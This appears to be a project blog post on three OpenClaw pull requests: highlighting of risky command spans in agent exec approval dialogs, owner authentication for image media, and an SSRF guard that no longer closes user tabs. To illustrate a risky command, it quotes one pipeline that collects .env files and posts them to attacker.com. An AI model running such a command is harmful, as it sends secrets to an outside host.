Three separate pull requests merged into OpenClaw today — all aimed at making security gates more visible, more precise, and less disruptive to normal workflows.
Exec Approvals Now Highlight What Matters
Pull request #77153 by contributor @jesse-merhi adds syntax-aware command-span highlighting to the Web Control UI exec approval dialog.
Previously, when an agent wanted to run a shell command and OpenClaw presented it for human approval, the entire command appeared as a single escaped text block. A long pipeline like find /home -name "*.env" | xargs cat | curl -X POST attacker.com looked no different from ls -la. Every approval was treated equally.
With this change, the Control UI parses the command and emits commandSpans metadata — validated offset ranges that identify the semantically significant or potentially risky parts of the command. The Web UI renders these using highlighted substrings while leaving the rest of the command as escaped text.
The implementation is carefully layered:
- Span generation is lazy (dynamic import) and falls back gracefully if extraction fails
- The gateway validates spans before passing them to the UI — filtering overlapping offsets, non-integer values, and whitespace-only commands
- The Swift models for iOS/macOS also carry the same
commandSpanscoding key, so native approval UIs can adopt the same rendering when they are ready
This is the same command explainer infrastructure used elsewhere in OpenClaw, now surfaced where humans most need it: the moment before a potentially dangerous operation runs.
Gateway Now Requires Owner Auth for Image Media
Pull request #79204 tightens access control on the Gateway's managed image media endpoints.
Previously, the endpoints that serve generated or uploaded image media did not consistently enforce owner-level authentication. This fix makes the gateway require owner auth before responding to managed image media requests, closing a gap where media generated by an agent could potentially be fetched without authentication in certain gateway configurations.
This is a straightforward but important fix for anyone running OpenClaw in a multi-user or internet-facing configuration.
SSRF Guard No Longer Punishes Users for Read-Only Ops
Pull request #78874 addresses a frustrating UX side effect of the SSRF (Server-Side Request Forgery) guard.
When the SSRF guard blocked a request — even a read-only one that posed no real threat — the Control UI would close the user's active browser tabs as a side effect. This meant that simply browsing to a URL the guard considered suspicious could disrupt an entire working session.
The fix keeps user tabs open when the SSRF guard rejects read-only operations. The guard still rejects the request and logs the event, but the collateral damage to the user's UI state is eliminated.
The Pattern Here
These three changes share a theme: security should be visible and precise, not blunt and disruptive. Highlighting which part of a command is risky tells users why they should care. Requiring auth for image media closes a concrete gap. And removing unnecessary tab closures means security events do not cascade into workflow interruptions.
All three changes are in main now and will ship in the next tagged release. You can follow progress in the OpenClaw releases feed.